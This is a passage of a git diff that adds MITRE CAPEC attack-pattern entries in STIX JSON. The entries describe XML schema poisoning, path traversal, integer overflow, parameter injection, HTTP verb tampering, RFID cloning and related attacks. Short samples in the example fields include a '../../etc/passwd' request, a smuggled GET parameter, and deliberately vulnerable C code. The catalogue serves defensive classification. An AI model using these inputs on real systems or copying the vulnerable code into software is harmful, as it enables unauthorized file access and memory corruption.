"2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "XML Schema Poisoning", + "description": "An adversary corrupts or modifies the content of XML schema information passed between a client and server for the purpose of undermining the security of the target. XML Schemas provide the structure and content definitions for XML documents. Schema poisoning is the ability to manipulate a schema either by replacing or modifying it to compromise the programs that process documents that use this schema. Possible attacks are denial of service attacks by modifying the schema so that it does not contain required information for subsequent processing. For example, the unaltered schema may require a @name attribute in all submitted documents. If the adversary removes this attribute from the schema then documents created using the new grammar may lack this field, which may cause the processing application to enter an unexpected state or record incomplete data. In addition, manipulation of the data types described in the schema may affect the results of calculations taken by the document reader. For example, a float field could be changed to an int field. Finally, the adversary may change the encoding defined in the schema for certain fields allowing the contents to bypass filters that scan for dangerous strings. For example, the modified schema might us a URL encoding instead of ASCII, and a filter that catches a semicolon (;) might fail to detect its URL encoding (%3B).", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/146.html", + "external_id": "CAPEC-146" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/15.html", + "external_id": "CWE-15" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/472.html", + "external_id": "CWE-472" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution (A successful schema poisoning attack can compromise the availability of the target system's service by exhausting its available resources.)", + "Resource Consumption (A successful schema poisoning attack can compromise the availability of the target system's service by exhausting its available resources.)" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_example_instances": [ + "\n XML Schema Poisoning Attacks can often occur locally due to being embedded within the XML document itself or being located on the host within an improperaly protected file. In these cases, the adversary can simply edit the XML schema without the need for additional privileges. An example of the former can be seen below:\n ]> John Smith 555-1234 jsmith@email.com
1 Example Lane
\n If the 'name' attribute is required in all submitted documents and this field is removed by the adversary, the application may enter an unexpected state or record incomplete data. Additionally, if this data is needed to perform additional functions, a Denial of Service (DOS) may occur.\n ", + "\n XML Schema Poisoning Attacks can also be executed remotely if the HTTP protocol is being used to transport data. :\n John Smith 555-1234 jsmith@email.com
1 Example Lane
\n The HTTP protocol does not encrypt the traffic it transports, so all communication occurs in plaintext. This traffic can be observed and modified by the adversary during transit to alter the XML schema before it reaches the end user. The adversary can perform a Man-in-the-Middle (MITM) Attack to alter the schema in the same way as the previous example and to acheive the same results.\n " + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Some level of access to modify the target schema.", + "The schema used by the target application must be improperly secured against unauthorized modification and manipulation." + ], + "x_capec_resources_required": [ + "Access to the schema and the knowledge and ability modify it. Ability to replace or redirect access to the modified schema." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--34377bad-4302-44b8-a8a9-1dcebaada4fd.json b/capec/attack-pattern/attack-pattern--34377bad-4302-44b8-a8a9-1dcebaada4fd.json new file mode 100644 index 0000000000..faf59fdfaf --- /dev/null +++ b/capec/attack-pattern/attack-pattern--34377bad-4302-44b8-a8a9-1dcebaada4fd.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--63bea30b-c4f0-4b12-bb92-c212896a985a", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--34377bad-4302-44b8-a8a9-1dcebaada4fd", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Shared Data Manipulation", + "description": "An adversary exploits a data structure shared between multiple applications or an application pool to affect application behavior. Data may be shared between multiple applications or between multiple threads of a single application. Data sharing is usually accomplished through mutual access to a single memory location. If an adversary can manipulate this shared data (usually by co-opting one of the applications or threads) the other applications or threads using the shared data will often continue to trust the validity of the compromised shared data and use it in their calculations. This can result in invalid trust assumptions, corruption of additional data through the normal operations of the other users of the shared data, or even cause a crash or compromise of the sharing applications.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/124.html", + "external_id": "CAPEC-124" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_prerequisites": [ + "The target applications (or target application threads) must share data between themselves.", + "The adversary must be able to manipulate some piece of the shared data either directly or indirectly and the other users of the data must accept the changed data as valid. Usually this requires that the adversary be able to compromise one of the sharing applications or threads in order to manipulate the shared data." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--34578435-31bc-4c4d-bb0a-61a3ab909633.json b/capec/attack-pattern/attack-pattern--34578435-31bc-4c4d-bb0a-61a3ab909633.json new file mode 100644 index 0000000000..8af42aa7ea --- /dev/null +++ b/capec/attack-pattern/attack-pattern--34578435-31bc-4c4d-bb0a-61a3ab909633.json @@ -0,0 +1,90 @@ +{ + "type": "bundle", + "id": "bundle--712b555d-33d2-4ca7-a8b5-584fa0666c52", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--34578435-31bc-4c4d-bb0a-61a3ab909633", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "name": "Path Traversal", + "description": "An adversary uses path manipulation methods to exploit insufficient input validation of a target to obtain access to data that should be not be retrievable by ordinary well-formed requests. A typical variety of this attack involves specifying a path to a desired file together with dot-dot-slash characters, resulting in the file access API or function traversing out of the intended directory structure and into the root file system. By replacing or modifying the expected path information the access function or API retrieves the file desired by the attacker. These attacks either involve the attacker providing a complete path to a targeted file or using control characters (e.g. path separators (/ or \\) and/or dots (.)) to reach desired directories or files.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/126.html", + "external_id": "CAPEC-126" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/22.html", + "external_id": "CWE-22" + }, + { + "source_name": "reference_from_CAPEC", + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1" + }, + { + "source_name": "reference_from_CAPEC", + "description": "The OWASP Application Security Desk Reference, 2009, The Open Web Application Security Project (OWASP)", + "url": "https://www.owasp.org/index.php/Path_Traversal", + "external_id": "REF-8" + }, + { + "source_name": "reference_from_CAPEC", + "description": "OWASP Testing Guide (v3), 2010, The Open Web Application Security Project (OWASP)", + "url": "https://www.owasp.org/index.php/Testing_for_Path_Traversal_(OWASP-AZ-001)", + "external_id": "REF-9" + }, + { + "source_name": "reference_from_CAPEC", + "description": "WASC Threat Classification 2.0, 2010, The Web Application Security Consortium (WASC)", + "url": "http://projects.webappsec.org/w/page/13246952/Path-Traversal", + "external_id": "REF-10" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_alternate_terms": [ + "Directory Traversal" + ], + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands (The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries.)", + "Unreliable Execution (The attacker may be able to overwrite, delete, or corrupt unexpected critical files such as programs, libraries, or important data. This may prevent the software from working at all and in the case of a protection mechanisms such as authentication, it has the potential to lockout every user of the software.)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries.)", + "Read Data (The attacker may be able read the contents of unexpected files and expose sensitive data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, by reading a password file, the attacker could conduct brute force password guessing attacks in order to break into an account on the system.)" + ], + "Integrity": [ + "Execute Unauthorized Commands (The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries.)", + "Modify Data (The attacker may be able to overwrite or create critical files, such as programs, libraries, or important data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, appending a new account at the end of a password file may allow an attacker to bypass authentication.)" + ] + }, + "x_capec_example_instances": [ + "\n An example of using path traversal to attack some set of resources on a web server is to use a standard HTTP request\n http://example/../../../../../etc/passwd\n From an attacker point of view, this may be sufficient to gain access to the password file on a poorly protected system. If the attacker can list directories of critical resources then read only access is not sufficient to protect the system.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The attacker must be able to control the path that is requested of the target.", + "The target must fail to adequately sanitize incoming paths" + ], + "x_capec_resources_required": [ + "The ability to manually manipulate path information either directly through a client application relative to the service or application or via a proxy application." + ], + "x_capec_skills_required": { + "Low": "Simple command line attacks or to inject the malicious payload in a web page.", + "Medium": "Customizing attacks to bypass non trivial filters in the application." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--34e6183c-256f-4bb9-8636-794024e28b4f.json b/capec/attack-pattern/attack-pattern--34e6183c-256f-4bb9-8636-794024e28b4f.json new file mode 100644 index 0000000000..7c7de626d2 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--34e6183c-256f-4bb9-8636-794024e28b4f.json @@ -0,0 +1,78 @@ +{ + "type": "bundle", + "id": "bundle--fe6c26b4-d9a5-4019-baf6-104e23b4108b", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--34e6183c-256f-4bb9-8636-794024e28b4f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "ICMP Echo Request Ping", + "description": "An adversary sends out an ICMP Type 8 Echo Request, commonly known as a 'Ping', in order to determine if a target system is responsive. If the request is not blocked by a firewall or ACL, the target host will respond with an ICMP Type 0 Echo Reply datagram. This type of exchange is usually referred to as a 'Ping' due to the Ping utility present in almost all operating systems. Ping, as commonly implemented, allows a user to test for alive hosts, measure round-trip time, and measure the percentage of packet loss. Performing this operation for a range of hosts on the network is known as a 'Ping Sweep'. While the Ping utility is useful for small-scale host discovery, it was not designed for rapid or efficient host discovery over large network blocks. Other scanning utilities have been created that make ICMP ping sweeps easier to perform. Most networks filter ingress ICMP Type 8 messages for security reasons. Various other methods of performing ping sweeps have developed as a result. It is important to recognize the key security goal of the adversary is to discover if an IP address is alive, or has a responsive host. To this end, virtually any type of ICMP message, as defined by RFC 792 is useful. An adversary can cycle through various types of ICMP messages to determine if holes exist in the firewall configuration. When ICMP ping sweeps fail to discover hosts, other protocols can be used for the same purpose, such as TCP SYN or ACK segments, UDP datagrams sent to closed ports, etc.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/285.html", + "external_id": "CAPEC-285" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html", + "external_id": "CWE-200" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33" + }, + { + "source_name": "reference_from_CAPEC", + "description": "J. Postel, RFC792 - Internet Control Messaging Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "url": "http://www.faqs.org/rfcs/rfc792.html", + "external_id": "REF-123" + }, + { + "source_name": "reference_from_CAPEC", + "description": "R. Braden, Ed., RFC1122 - Requirements for Internet Hosts - Communication Layers, 1989--10", + "url": "http://www.faqs.org/rfcs/rfc1122.html", + "external_id": "REF-124" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Mark Wolfgang, Host Discovery with Nmap, 2002--11", + "url": "http://nmap.org/docs/discovery.pdf", + "external_id": "REF-125" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC, ISBN: 978-0-9799587-1-7", + "external_id": "REF-34" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Confidentiality": [ + "Other (A successful attack of this kind can identify open ports and available services on a system.)" + ] + }, + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to send an ICMP type 8 query (Echo Request) to a remote target and receive an ICMP type 0 message (ICMP Echo Reply) in response. Any firewalls or access control lists between the sender and receiver must allow ICMP Type 8 and ICMP Type 0 messages in order for a ping operation to succeed." + ], + "x_capec_resources_required": [ + "Scanners or utilities that provide the ability to send custom ICMP queries." + ], + "x_capec_skills_required": { + "Low": "The adversary needs to know certain linux commands for this type of attack." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--34f01011-987b-4447-8663-e32f695409cc.json b/capec/attack-pattern/attack-pattern--34f01011-987b-4447-8663-e32f695409cc.json new file mode 100644 index 0000000000..7d3a43f554 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--34f01011-987b-4447-8663-e32f695409cc.json @@ -0,0 +1,122 @@ +{ + "type": "bundle", + "id": "bundle--58bace41-8668-4726-b7b8-37f2e7175431", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--34f01011-987b-4447-8663-e32f695409cc", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Forced Integer Overflow", + "description": "This attack forces an integer variable to go out of range. The integer variable is often used as an offset such as size of memory allocation or similarly. The attacker would typically control the value of such variable and try to get it out of range. For instance the integer in question is incremented past the maximum possible value, it may wrap to become a very small, or negative number, therefore providing a very incorrect value which can lead to unexpected behavior. At worst the attacker can execute arbitrary code.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/92.html", + "external_id": "CAPEC-92" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/190.html", + "external_id": "CWE-190" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/128.html", + "external_id": "CWE-128" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html", + "external_id": "CWE-120" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/122.html", + "external_id": "CWE-122" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/196.html", + "external_id": "CWE-196" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/680.html", + "external_id": "CWE-680" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html", + "external_id": "CWE-697" + }, + { + "source_name": "reference_from_CAPEC", + "description": "J. Viega, G. McGraw, Building Secure Software, 2002, Addison-Wesley", + "external_id": "REF-131" + }, + { + "source_name": "reference_from_CAPEC", + "description": "The OWASP Application Security Desk Reference, 2009, The Open Web Application Security Project (OWASP)", + "url": "http://www.owasp.org/index.php/Integer_overflow", + "external_id": "REF-546" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Robert C. Seacord, SAMATE - Software Assurance Metrics And Tool Evaluation, 2006--05---22, National Institute of Standards and Technology (NIST)", + "url": "http://samate.nist.gov/SRD/view_testcase.php?tID=1511", + "external_id": "REF-547" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Robert C. Seacord, Secure Coding in C and C++", + "external_id": "REF-548" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Unreliable Execution" + ], + "Confidentiality": [ + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_example_instances": [ + "Integer overflow in the ProcAuWriteElement function in server/dia/audispatch.c in Network Audio System (NAS) before 1.8a SVN 237 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a large max_samples value. See also: CVE-2007-1544", + "\n The following code illustrates an integer overflow. The declaration of total integer as \"unsigned short int\" assumes that the length of the first and second arguments fits in such an integer.\n include include include \n int main (int argc, char *const *argv){if (argc !=3){printf(\"Usage: prog_name \\n\");exit(-1);\n }unsigned short int total;total = strlen(argv[1])+strlen(argv[2])+1;char * buff = (char *)malloc(total);strcpy(buff, argv[1]);strcpy(buff, argv[2]);\n }\n [R.92.4], [R.92.5]\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The attacker can manipulate the value of an integer variable utilized by the target host.", + "The target host does not do proper range checking on the variable before utilizing it.", + "When the integer variable is incremented or decremented to an out of range value, it gets a very different value (e.g. very small or negative number)" + ], + "x_capec_skills_required": { + "High": "Exploiting a buffer overflow by injecting malicious code into the stack of a software system or even the heap can require a higher skill level.", + "Low": "An attacker can simply overflow an integer by inserting an out of range value." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--352283e6-a4db-4959-8679-239ed1a7d8f6.json b/capec/attack-pattern/attack-pattern--352283e6-a4db-4959-8679-239ed1a7d8f6.json new file mode 100644 index 0000000000..e24f31f6c4 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--352283e6-a4db-4959-8679-239ed1a7d8f6.json @@ -0,0 +1,41 @@ +{ + "type": "bundle", + "id": "bundle--6a7e5d35-bb51-45f8-a206-0e1d4800b4c3", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--352283e6-a4db-4959-8679-239ed1a7d8f6", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Software Integrity Attack", + "description": "An attacker initiates a series of events designed to cause a user, program, server, or device to perform actions which undermine the integrity of software code, device data structures, or device firmware, achieving the modification of the target's integrity to achieve an insecure state.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/184.html", + "external_id": "CAPEC-184" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/494.html", + "external_id": "CWE-494" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_resources_required": [ + "Software Integrity Attacks are usually a late stage focus of attack activity which depends upon the success of a chain of prior events. The resources required to perform the attack vary with respect to the overall attack strategy, existing countermeasures which must be bypassed, and the success of early phase attack vectors." + ], + "x_capec_skills_required": { + "Medium": "Manual or user-assisted attacks require deceptive mechanisms to trick the user into clicking a link or downloading and installing software. Automated update attacks require the attacker to host a payload and then trigger the installation of the payload code." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--35464428-e136-4677-aaa0-19da2fe51c55.json b/capec/attack-pattern/attack-pattern--35464428-e136-4677-aaa0-19da2fe51c55.json new file mode 100644 index 0000000000..c19e8856b8 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--35464428-e136-4677-aaa0-19da2fe51c55.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--1647f806-9f09-4f74-9ecf-a62e6fef3551", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--35464428-e136-4677-aaa0-19da2fe51c55", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Parameter Injection", + "description": "An adversary manipulates the content of request parameters for the purpose of undermining the security of the target. Some parameter encodings use text characters as separators. For example, parameters in a HTTP GET message are encoded as name-value pairs separated by an ampersand (&). If an attacker can supply text strings that are used to fill in these parameters, then they can inject special characters used in the encoding scheme to add or modify parameters. For example, if user input is fed directly into an HTTP GET request and the user provides the value \"myInput&new_param=myValue\", then the input parameter is set to myInput, but a new parameter (new_param) is also added with a value of myValue. This can significantly change the meaning of the query that is processed by the server. Any encoding scheme where parameters are identified and separated by text characters is potentially vulnerable to this attack - the HTTP GET encoding used above is just one example.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/137.html", + "external_id": "CAPEC-137" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/88.html", + "external_id": "CWE-88" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Integrity": [ + "Modify Data (Successful parameter injection attacks mean a compromise to integrity of the application.)" + ] + }, + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The target application must use a parameter encoding where separators and parameter identifiers are expressed in regular text.", + "The target application must accept a string as user input, fail to sanitize characters that have a special meaning in the parameter encoding, and insert the user-supplied string in an encoding which is then processed." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. The only requirement is the ability to provide string input to the target." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--35abccd5-51c3-4107-9ff9-956e33d8a6a6.json b/capec/attack-pattern/attack-pattern--35abccd5-51c3-4107-9ff9-956e33d8a6a6.json new file mode 100644 index 0000000000..a97c561610 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--35abccd5-51c3-4107-9ff9-956e33d8a6a6.json @@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--a6a946c8-42af-4bd6-92cd-bb57e4065fc0", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--35abccd5-51c3-4107-9ff9-956e33d8a6a6", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "HTTP Verb Tampering", + "description": "An attacker modifies the HTTP Verb (e.g. GET, PUT, TRACE, etc.) in order to bypass access restrictions. Some web environments allow administrators to restrict access based on the HTTP Verb used with requests. However, attackers can often provide a different HTTP Verb, or even provide a random string as a verb in order to bypass these protections. This allows the attacker to access data that should otherwise be protected.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/274.html", + "external_id": "CAPEC-274" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/302.html", + "external_id": "CWE-302" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/654.html", + "external_id": "CWE-654" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Arshan Dabirsiaghi, Bypassing Web Authentication and Authorization with HTTP Verb Tampering: How to inadvertently allow attackers full access to your web application, Aspect Security", + "url": "http://mirror.transact.net.au/sourceforge/w/project/wa/waspap/waspap/Core/Bypassing_VBAAC_with_HTTP_Verb_Tampering.pdf", + "external_id": "REF-118" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_prerequisites": [ + "The targeted system must attempt to filter access based on the HTTP verb used in requests." + ], + "x_capec_resources_required": [ + "The attacker requires a tool that allows them to manually control the HTTP verb used to send messages to the targeted server." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--35adbffa-db1b-48cb-a106-51dccf223be1.json b/capec/attack-pattern/attack-pattern--35adbffa-db1b-48cb-a106-51dccf223be1.json new file mode 100644 index 0000000000..25de1a6431 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--35adbffa-db1b-48cb-a106-51dccf223be1.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--c3a4b544-8cb0-42ac-886c-162ebc73e87d", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--35adbffa-db1b-48cb-a106-51dccf223be1", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Malicious Logic Inserted Into Product Software by Authorized Developer", + "description": "An adversary uses their privileged position within an authorized software development organization to inject malicious logic into a codebase or product. Supply chain attacks from approved or trusted developers are extremely difficult to detect as it is generally assumed the quality control and internal security measures of these organizations conform to best practices. In some cases the malicious logic is intentional, embedded by a disgruntled employee, programmer, or individual with an otherwise hidden agenda. In other cases, the integrity of the product is compromised by accident (e.g. by lapse in the internal security of the organization that results in a product becoming contaminated). In other cases, the developer embeds a backdoor into a product to serve some purpose, such as product support, but discovery of the backdoor results in its malicious use by adversaries.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/443.html", + "external_id": "CAPEC-443" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Information Technology Laboratory, Supply Chain Risk Management (SCRM), 2010, National Institute of Standards and Technology (NIST)", + "external_id": "REF-379" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Access to the software during the development phase." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--36182365-d1a2-4f8e-a998-9a6d48f8c528.json b/capec/attack-pattern/attack-pattern--36182365-d1a2-4f8e-a998-9a6d48f8c528.json new file mode 100644 index 0000000000..1ebd2bbd2f --- /dev/null +++ b/capec/attack-pattern/attack-pattern--36182365-d1a2-4f8e-a998-9a6d48f8c528.json @@ -0,0 +1,34 @@ +{ + "type": "bundle", + "id": "bundle--f794e327-4130-46bc-a636-2aed76e100ea", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--36182365-d1a2-4f8e-a998-9a6d48f8c528", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Cloning RFID Cards or Chips", + "description": "An attacker analyzes data returned by an RFID chip and uses this information to duplicate a RFID signal that responds identically to the target chip. In some cases RFID chips are used for building access control, employee identification, or as markers on products being delivered along a supply chain. Some organizations also embed RFID tags inside computer assets to trigger alarms if they are removed from particular rooms, zones, or buildings. Similar to Magnetic strip cards, RFID cards are susceptible to duplication (cloning) and reuse. RFID (Radio Frequency Identification) are passive devices which consist of an integrated circuit for processing RF signals and an antenna. RFID devices are passive in that they lack an on on-board power source. The majority of RFID chips operate on either the 13.56 MHz or 135 KHz frequency. The chip is powered when a signal is received by the antenna on the chip, powering the chip long enough to send a reply message. An attacker is able to capture and analyze RFID data by either stimulating the chip to respond or being proximate to the chip when it sends a response to a remote transmitter. This allows the attacker to duplicate the signal and conduct attacks such as gaining unauthorized access to a building or impersonating a user's identification.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/399.html", + "external_id": "CAPEC-399" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--3633a1c0-2af2-4343-b504-4e69c76db60e.json b/capec/attack-pattern/attack-pattern--3633a1c0-2af2-4343-b504-4e69c76db60e.json new file mode 100644 index 0000000000..e855b7b055 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--3633a1c0-2af2-4343-b504-4e69c76db60e.json @@ -0,0 +1,93 @@ +{ + "type": "bundle", + "id": "bundle--0272d075-4fc1-4ebe-a53e-7b45fa56cf7c", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--3633a1c0-2af2-4343-b504-4e69c76db60e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "OS Command Injection", + "description": "In this type of an attack, an adversary injects operating system commands into existing application functions. An application that uses untrusted input to build command strings is vulnerable. An adversary can leverage OS command injection in an application to elevate privileges, execute arbitrary commands and compromise the underlying operating system.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/88.html", + "external_id": "CAPEC-88" + }, 